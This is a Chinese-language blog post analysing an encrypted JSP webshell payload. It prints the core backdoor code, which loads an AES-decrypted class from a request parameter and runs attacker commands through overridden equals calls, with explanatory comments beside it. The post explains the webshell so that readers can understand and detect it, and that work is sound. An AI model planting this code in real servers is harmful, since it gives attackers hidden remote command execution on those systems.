jsp payload解析

try {

byte[] data = base64Decode(request.getParameter(pass)); #HTTP请求中的参数 pass

data = x(data, false); #AES解密

if (application.getAttribute("GOx2") == null) { #GOx2是Webshell 代码动态设置的,用于存储特定的数据或对象

application.setAttribute("GOx2", new X(this.getClass().getClassLoader()).Q(data)); #从字节数组 data 中加载一个类,存储在 "GOx2" 的属性中。应该是对equals的重写

} else {

java.io.ByteArrayOutputStream arrOut = new java.io.ByteArrayOutputStream(); #动态存储输出流

Object f = ((Class) application.getAttribute("GOx2")).newInstance(); #把第一次请求的GOx2存储的类,赋值给对象f

f.equals(request); #执行恶意请求

f.equals(arrOut); #在equals方法中,恶意代码会检查obj是否是ByteArrayOutputStream实例。如果是,它可能会执行写入数据

f.equals(data);

response.getWriter().write(md5.substring(0, 16)); #先传入 request 可能是为了准备一些数据或环境,然后传入 arrOut 进行某些输出操作,最后传入 data 执行最终的恶意代码。

f.toString();

response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true))); #加密回显

response.getWriter().write(md5.substring(16)); #混淆与隐藏

}

} catch(Exception e) {}

是一个后门或Webshell,AES加密保护,使用预定义的密钥 xc 进行解密

先获取HTTP请求中的参数 pass,然后AES解密

第一次请求,pass解密之后是对equals的重写,因为GOx2为空,就存储在 "GOx2" 的属性中,方便后面调用

第二次请求才是真正的命令执行,因为GOx2已经有值,所以执行else,先调用GOx2中重写的equals给f进行命令执行

为什么是三次

f.equals(request);requst可能有除了pass其他恶意命令,准备一些数据或环境或者可能和pass(传入data)的内容进行拼接使用

f.equals(request);、f.equals(data);可以是联合共同执行命令

f.equals(arrOut);传出恶意代码,会检查obj是否是ByteArrayOutputStream实例。如果是,它可能会执行写入数据

最后response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true))); 加密回显

相关推荐
千枫s1 天前
电脑vm虚拟机kali linux安装shannon
学习·网络安全
数字供应链安全产品选型1 天前
AI造“虾”易,治理难?悬镜多模态 SCA 技术破局 AI 数字供应链治理困局!
人工智能·安全·网络安全·ai-native
网络安全许木1 天前
自学渗透测试第12天(渗透测试流程与DVWA部署)
web安全·网络安全·渗透测试
聊点儿技术1 天前
IP风险评分80分是怎么算出来的?从权重分配到计算逻辑
网络安全·金融·ip·电商·ip风险评估·风控开发·评估ip风险
vortex51 天前
SOAP 协议中的 XML 外部实体注入(XXE)漏洞
xml·网络安全·渗透测试
一名优秀的码农1 天前
vulhub系列-64-Cereal: 1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
一名优秀的码农1 天前
vulhub系列-66-Hms?: 1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
CHICX12291 天前
5.SQL 注入之高权限注入(下):文件读写 + 写 Shell,从数据库权限到服务器控制权
web安全·网络安全
Sombra_Olivia1 天前
Vulhub 中的 bash CVE-2014-6271
安全·web安全·网络安全·渗透测试·vulhub
CHICX12291 天前
6.SQL 注入之基础防御:从魔术引号到类型校验,彻底封堵注入漏洞
web安全·网络安全